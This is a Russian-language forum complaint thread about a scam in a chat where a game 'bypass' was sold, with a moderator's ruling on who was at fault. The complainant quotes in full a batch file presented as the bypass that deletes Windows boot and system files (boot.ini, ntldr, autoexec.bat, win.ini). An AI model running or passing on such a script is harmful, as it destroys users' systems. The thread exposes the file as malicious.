Решено #Yankee

Статус
В этой теме нельзя размещать новые ответы.

|Il|Il|

Активный
Автор темы
407
70
1. https://www.blast.hk/members/416401/ #Yankee
2. Дата и время когда это произошло. 21.12.2021 18:24
3. Ссылка на тему, описание товара, на что вы были обмануты. В вк обманут на обход сантроп
4. Подробное описание случившегося.
Я купил вход в беседу, Меня добавили в беседу все было отлично общались разговаривали, Там же был файл обход для сантропе, Я попросил чтобы он кинул мне его на что он кидает два файла один bat файл (который оказывается с троянами) кст вот его (мол трояны)) другой luac файл
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Дальше он говорит мне чтобы качал оба файла я качай 1 файл без проблем качается 2 качаю который batt не качается, я ничего не подозреваю пишу им говорю вот так он не скачивается залейте его в Google диск или Yandex Disk на что он отвечает *Увы но нет, Спс за деньги* После сразу удаляет благо у меня сова удалённые сохраняются дальше я заподозрил то что в batnik файле трояны и пишу вот так трояны в файле , на что он отвечает Странно , отмечает другого человека и говорит ты знаешь что делать и кикает меня
Сказать хочу одно он обманщик не верьте ему
5. Доказательства.
 

atomlin

Известный
580
386
decompile SNTR_Mobile.luac
 

Вложения

  • K-Woz0kEkdk.jpg
    K-Woz0kEkdk.jpg
    73.9 KB · Просмотры: 196

|Il|Il|

Активный
Автор темы
407
70
Последнее редактирование:

Vintik

Мечтатель
Проверенный
1,471
920
@#Yankee, ну расскажи нам, это всё правда, что про тебя написано? В конфе "сливаешь" вредоносное ПО?
 

sᴀxᴏɴ

#Mary
Всефорумный модератор
791
846
Жалоба написана не на того человека так как @#Yankee не является продавцом в данной ситуации и все договоренности с ним не имеют значения. Деньги переводились на счёт @mzxer и переписка о переводе средств за вход в беседу проводилась именно с ним. Договор между вами был только на вход в беседу, наличие в ней каких-то скриптов не было обговорено.

Этот вопрос решили, в конфу тебя вернули.

За распространение вредоносного ПО @#Yankee наказан не будет так как это произошло в беседе, которая не имеет к форуму никакого отношения.
 
Статус
В этой теме нельзя размещать новые ответы.